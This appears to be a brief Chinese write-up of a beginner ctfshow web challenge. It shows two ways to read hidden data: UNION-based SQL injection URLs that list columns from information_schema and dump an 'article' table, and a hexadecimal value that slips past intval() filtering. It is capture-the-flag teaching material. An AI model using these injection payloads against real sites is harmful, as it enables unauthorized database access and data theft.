ctfshow—萌新—web1

0x00 前言

  • CTF 加解密合集
  • CTF Web合集

0x01 题目

ctfshow—萌新—web1_第1张图片

0x02 Write Up

解法1

标准的数字型注入

查列名

http://cc3ecc3f-8c42-4624-979e-277a51ea85d2.challenge.ctf.show/?id=1%20union%20select%20table_name,column_name,3%20from%20information_schema.columns%20where%20table_name=%27article%27%20--+

ctfshow—萌新—web1_第2张图片
查数据

http://cc3ecc3f-8c42-4624-979e-277a51ea85d2.challenge.ctf.show/?id=1%20union%20select%201,content,3%20from%20article%20--+

ctfshow—萌新—web1_第3张图片

解法2

intval()函数 如果遇到0x就会识别为0,所以可以通过十六进制进行查询?id=0x3E8

ctfshow—萌新—web1_第4张图片

以上

你可能感兴趣的:(安全)